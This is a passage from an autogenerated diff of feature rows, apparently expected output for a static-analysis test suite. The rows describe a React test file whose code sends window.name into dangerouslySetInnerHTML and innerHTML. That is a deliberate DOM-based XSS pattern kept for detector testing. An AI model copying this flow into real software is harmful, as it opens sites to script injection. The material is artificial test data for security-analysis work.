autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:10:15:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:17:15:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:36 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:36 | useState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:36 | useState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:36 | useState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:36 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | exceptional return of useState('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | exceptional return of useState('foo') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | exceptional return of useState('foo') | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | exceptional return of useState('foo') | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | exceptional return of useState('foo') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | useState('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | useState('foo') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | useState('foo') | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | useState('foo') | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:15:29:15:43 | useState('foo') | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:15:38:15:42 | 'foo' | CalleeFlexibleAccessPath | useState | | autogenerated/Xss/DomBasedXss/react-use-state.js:15:38:15:42 | 'foo' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:15:38:15:42 | 'foo' | calleeImports | react | @@ -14676,6 +106889,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:15:38:15:42 | 'foo' | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:15:38:15:42 | 'foo' | enclosingFunctionName | setStateValueLazy | | autogenerated/Xss/DomBasedXss/react-use-state.js:15:38:15:42 | 'foo' | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:12 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:12 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:12 | setState | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:12 | setState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:12 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | exceptional return of setStat ... w.name) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | exceptional return of setStat ... w.name) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | exceptional return of setStat ... w.name) | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | exceptional return of setStat ... w.name) | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | exceptional return of setStat ... w.name) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | setStat ... w.name) | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | setStat ... w.name) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | setStat ... w.name) | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | setStat ... w.name) | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:5:16:31 | setStat ... w.name) | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | 'arguments' object of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | 'arguments' object of anonymous function | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | 'arguments' object of anonymous function | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | 'arguments' object of anonymous function | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | () => window.name | CalleeFlexibleAccessPath | setState | | autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | () => window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | () => window.name | calleeImports | react | @@ -14684,18 +106917,164 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | () => window.name | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | () => window.name | enclosingFunctionName | setStateValueLazy | | autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | () => window.name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | exceptional return of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | exceptional return of anonymous function | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | exceptional return of anonymous function | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | exceptional return of anonymous function | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | return of anonymous function | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | return of anonymous function | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | return of anonymous function | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:14:16:30 | return of anonymous function | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:25 | window | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:25 | window | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:25 | window | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:25 | window | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:25 | window | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:30 | window.name | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:30 | window.name | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:30 | window.name | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:30 | window.name | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:20:16:30 | window.name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:27:16:30 | name | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:27:16:30 | name | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:27:16:30 | name | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:27:16:30 | name | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:16:27:16:30 | name | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:12:17:64 |
    | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:12:17:64 |
    | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:12:17:64 |
    | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:12:17:64 |
    | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:12:17:64 |
    | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:13:17:15 | div | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:13:17:15 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:13:17:15 | div | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:13:17:15 | div | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:13:17:15 | div | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:39 | dangero ... nerHTML | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:39 | dangero ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:39 | dangero ... nerHTML | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:39 | dangero ... nerHTML | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:39 | dangero ... nerHTML | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:17:17:57 | dangero ... state}} | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:42:17:56 | {__html: state} | assignedToPropName | dangerouslySetInnerHTML | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:42:17:56 | {__html: state} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:42:17:56 | {__html: state} | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:42:17:56 | {__html: state} | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:42:17:56 | {__html: state} | enclosingFunctionName | setStateValueLazy | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:42:17:56 | {__html: state} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:48 | __html | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:48 | __html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:48 | __html | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:48 | __html | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:48 | __html | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:17:43:17:55 | __html: state | fileImports | react | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:51:17:55 | state | assignedToPropName | __html | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:51:17:55 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:51:17:55 | state | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:51:17:55 | state | enclosingFunctionBody | state setState useState foo setState window name div dangerouslySetInnerHTML __html state | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:51:17:55 | state | enclosingFunctionName | setStateValueLazy | | autogenerated/Xss/DomBasedXss/react-use-state.js:17:51:17:55 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | this | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | this | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | this | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | this | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | useState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | useState | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | useState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:20:0 | useState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | 'arguments' object of function setStateValueLazy | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | 'arguments' object of function setStateValueLazy | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | 'arguments' object of function setStateValueLazy | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | 'arguments' object of function setStateValueLazy | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | 'arguments' object of function setStateValueLazy | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | exceptional return of function setStateValueLazy | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | exceptional return of function setStateValueLazy | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | exceptional return of function setStateValueLazy | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | exceptional return of function setStateValueLazy | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | exceptional return of function setStateValueLazy | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | functio ... ame);\\n} | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | functio ... ame);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | functio ... ame);\\n} | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | return of function setStateValueLazy | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | return of function setStateValueLazy | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | return of function setStateValueLazy | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | return of function setStateValueLazy | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:1:26:1 | return of function setStateValueLazy | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:10:20:26 | setStateValueLazy | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:10:20:26 | setStateValueLazy | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:20:10:20:26 | setStateValueLazy | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:25 | [state, setState] | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:25 | [state, setState] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:25 | [state, setState] | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:25 | [state, setState] | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:25 | [state, setState] | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | [state, ... ('foo') | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | [state, ... ('foo') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | [state, ... ('foo') | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | [state, ... ('foo') | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | [state, ... ('foo') | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | setState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | setState | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | setState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:9:21:43 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:10:21:14 | state | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | enclosingFunctionName | setStateValueLazy | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:17:21:24 | setState | fileImports | react | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:36 | useState | contextFunctionInterfaces | initialState()\nsetStateValue()\nsetStateValueLazy()\nsetStateValueLazy()\nsetStateValueSafe() | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:36 | useState | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/react-use-state.js:21:29:21:36 | useState | enclosingFunctionBody | state setState useState foo setState prev document body innerHTML prev setState window name | +| 